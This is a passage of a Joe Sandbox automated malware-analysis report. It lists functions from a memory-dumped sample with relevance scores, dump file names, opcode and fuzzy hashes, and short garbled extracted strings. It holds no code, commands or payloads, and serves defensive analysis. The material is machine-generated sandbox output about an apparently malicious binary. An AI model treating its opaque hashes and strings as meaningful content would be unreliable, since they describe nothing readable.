                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: +2/?$=79$BBSH$GZE^
                                                                                              • API String ID: 0-3392023846
                                                                                              • Opcode ID: 770388401e19c42786881dfef68cbe325e8c3b18219d02be9b93d2279bed3720
                                                                                              • Instruction ID: a18ed7fa911b1a05f053f79f95dd702bd02929ef79fae1060b55a8e119a7ed09
                                                                                              • Opcode Fuzzy Hash: 770388401e19c42786881dfef68cbe325e8c3b18219d02be9b93d2279bed3720
                                                                                              • Instruction Fuzzy Hash: B8520F70504B418FC735CF29C890726BBE2FF56314F188AADD4E68BB92CB35A946DB50
                                                                                              Function 00B2B210 Relevance: 5.5, Strings: 4, Instructions: 464COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: H{D}$TgXy$_o]a$=>?
                                                                                              • API String ID: 0-2004217480
                                                                                              • Opcode ID: dfe69116f8b7e6caaf11751f8201e1c3f1657af2311205b3193d31ab21a17975
                                                                                              • Instruction ID: 8cf437b4a94c3a60cecfb9d846dd5754f36da6a2ce299d51ea16e03706730a36
                                                                                              • Opcode Fuzzy Hash: dfe69116f8b7e6caaf11751f8201e1c3f1657af2311205b3193d31ab21a17975
                                                                                              • Instruction Fuzzy Hash: C11247B1110B01CFD3348F25D895B97BBF5FB45314F048A6DD5AA8BAA0DBB8A455CF80
                                                                                              Function 00B47E20 Relevance: 5.5, Strings: 4, Instructions: 461COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: =:;8$=:;8$a{$kp
                                                                                              • API String ID: 0-2717198472
                                                                                              • Opcode ID: 9280a9d9edca31c08353011e8c57949b04be69c297d366c514b53faf70d059b7
                                                                                              • Instruction ID: 5a3dfa4a2c97e80e2def69900e561135b0778d2b1b42700dae4f00777cf2dc71
                                                                                              • Opcode Fuzzy Hash: 9280a9d9edca31c08353011e8c57949b04be69c297d366c514b53faf70d059b7
                                                                                              • Instruction Fuzzy Hash: 36E1CEB5658341DFE320DF24D881B6FBBE1FBC5308F14896CE5898B295DB789905CB82
                                                                                              Function 00B2AD00 Relevance: 5.4, Strings: 4, Instructions: 424COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @A$lPLN$svfZ$IK
                                                                                              • API String ID: 0-1806543684
                                                                                              • Opcode ID: dcb4637a9a1c4f14e18cf6a80b7fd8623bfd2331ffb9b08aaeed4b2ce4305dd9
                                                                                              • Instruction ID: 6b85710462d8307ef35e0ac11d9031f3c5cd84f2eb044da136ea801cf930641c
                                                                                              • Opcode Fuzzy Hash: dcb4637a9a1c4f14e18cf6a80b7fd8623bfd2331ffb9b08aaeed4b2ce4305dd9
                                                                                              • Instruction Fuzzy Hash: CFC12A7165C3948FD3148E6494A176FBBE2EBC2700F18C96CE4E95B345DB758C09DB82
                                                                                              Function 00CF0BD0 Relevance: 5.4, Strings: 3, Instructions: 1618COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @ Wr$@on$yD@
                                                                                              • API String ID: 0-3107806357
                                                                                              • Opcode ID: 343a1d6f2d6b9e69317d660a374fe1de8740c324c9e2f7ee415f96c12a50b617
                                                                                              • Instruction ID: 2c2c8103f39a4c52d3f092c90b27664af6d888498b0682002b5244faa365c4a1
                                                                                              • Opcode Fuzzy Hash: 343a1d6f2d6b9e69317d660a374fe1de8740c324c9e2f7ee415f96c12a50b617
                                                                                              • Instruction Fuzzy Hash: DAB2F3F360C204AFE3047E29EC85A7AFBE9EF94720F16493DE6C583740EA3558458697
                                                                                              Function 00B24040 Relevance: 4.2, Strings: 3, Instructions: 428COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )$)$IEND
                                                                                              • API String ID: 0-588110143
                                                                                              • Opcode ID: aeb2743abff1985c4a33eec7bcbf9f53904e284fa17b8bb986b9850d9c2553a3
                                                                                              • Instruction ID: 5f0b517c45222f2995ee57a6b674b369406e72e1db4a5ee1494e332b4db9f527
                                                                                              • Opcode Fuzzy Hash: aeb2743abff1985c4a33eec7bcbf9f53904e284fa17b8bb986b9850d9c2553a3
                                                                                              • Instruction Fuzzy Hash: 74F1F3B1A087119BE314DF28E89172ABBE0FF94304F04466DF999977D2DB74E914CB82
                                                                                              Function 00CED669 Relevance: 4.1, Strings: 2, Instructions: 1573COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !yOv$}o7{
                                                                                              • API String ID: 0-384538273
                                                                                              • Opcode ID: 3657ac1aec85afe6fa5f4d054761067ce9eec66ee0ef04558c805263f23fbd70
                                                                                              • Instruction ID: ea1d039187a85dc35f1814caa4f424021e2c1b52da5ab7740ee23b7e48fde025
                                                                                              • Opcode Fuzzy Hash: 3657ac1aec85afe6fa5f4d054761067ce9eec66ee0ef04558c805263f23fbd70
                                                                                              • Instruction Fuzzy Hash: A7B2E4F3A0C2009FE3146E29EC8567AFBE9EF94720F1A493DEAC4C7740E63558458697
                                                                                              Function 00B45E90 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @J$KP$VD
                                                                                              • API String ID: 0-3841663987
                                                                                              • Opcode ID: 043c4ce2bf795cdb29daef0602e26f318d0a224b5cf7e7d2665bdeff8d39cb3c
                                                                                              • Instruction ID: e771eca9b9a7c24ead39d0983bd03de80f4c48f218dbb8e60b0cb20344bf18e6
                                                                                              • Opcode Fuzzy Hash: 043c4ce2bf795cdb29daef0602e26f318d0a224b5cf7e7d2665bdeff8d39cb3c
                                                                                              • Instruction Fuzzy Hash: 80918572744B019FE720CF68CC817ABBBB1FB91304F14456CE5869B781C778A815CB92
                                                                                              Function 00B8E01E Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *h_$Hc^{$Hc^{
                                                                                              • API String ID: 0-4141229500
                                                                                              • Opcode ID: dde60f9f8eed3ea021c81d635e46bb6ab5fa47389287aeb7451bb243bd3195d0
                                                                                              • Instruction ID: e5638f0f9990ab92b26af508912e1bcfd4a02a609fa4144743f2270b773f4d42
                                                                                              • Opcode Fuzzy Hash: dde60f9f8eed3ea021c81d635e46bb6ab5fa47389287aeb7451bb243bd3195d0
                                                                                              • Instruction Fuzzy Hash: BD8106B3A083109FE354AA2DDC5477AB7D5EFC4720F1A893DEAC8C7384E938584186C6
                                                                                              Function 00B2C02B Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PQ$A_$IG
                                                                                              • API String ID: 0-2179527320
                                                                                              • Opcode ID: 7730d20d26c0120ba4adef05bde4a362ccaa6d810564131592cc042a6ce50605
                                                                                              • Instruction ID: 5b552898c52836c772d88e9eb306f7a59545250e72cd4b88e295e73d941593be
                                                                                              • Opcode Fuzzy Hash: 7730d20d26c0120ba4adef05bde4a362ccaa6d810564131592cc042a6ce50605
                                                                                              • Instruction Fuzzy Hash: AB41BCB000C351CAC704CF21D882A6BBBF0FF96758F249A5DE0C59B295D7758586CB8A
                                                                                              Function 00B5F8D0 Relevance: 3.3, Strings: 2, Instructions: 813COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: cC$jC
                                                                                              • API String ID: 0-2055910567
                                                                                              • Opcode ID: b0f90878c083490aa5f8f6c4e1b897dc1794948471c54d1950bcb6fa36186ce8
                                                                                              • Instruction ID: f3ea3a1a46c7e20c1a07d46ae9e397c3617600867c2a744a0ec1631003e906e0
                                                                                              • Opcode Fuzzy Hash: b0f90878c083490aa5f8f6c4e1b897dc1794948471c54d1950bcb6fa36186ce8
                                                                                              • Instruction Fuzzy Hash: 3F42F336F15211CFCB08CF68D8916AEB7F2FB89311F1985BDC946A7391DA789901CB80
                                                                                              Function 00B5C040 Relevance: 3.1, Strings: 2, Instructions: 624COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: f$
                                                                                              • API String ID: 2994545307-508322865
                                                                                              • Opcode ID: 0c2293f13a9e589303498e60cb5b0de7e722faebdf02a5afc5ade5e007df8fb0
                                                                                              • Instruction ID: 7f0dc732b6708549cd34c236b5f01780963d0d9ffbd1d1b7ef0eae1ecbf041e5
                                                                                              • Opcode Fuzzy Hash: 0c2293f13a9e589303498e60cb5b0de7e722faebdf02a5afc5ade5e007df8fb0
                                                                                              • Instruction Fuzzy Hash: D812D3706083419FD714CF29C890B2BBFE2EBC9315F248AACE99597292D771DC49CB52
                                                                                              Function 00CE847D Relevance: 2.8, Strings: 1, Instructions: 1599COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `Kg
                                                                                              • API String ID: 0-1535029069
                                                                                              • Opcode ID: 613c9b39458c86d0f513fc7d2d8686fa9934ce366717ed141a0541badea1d58b
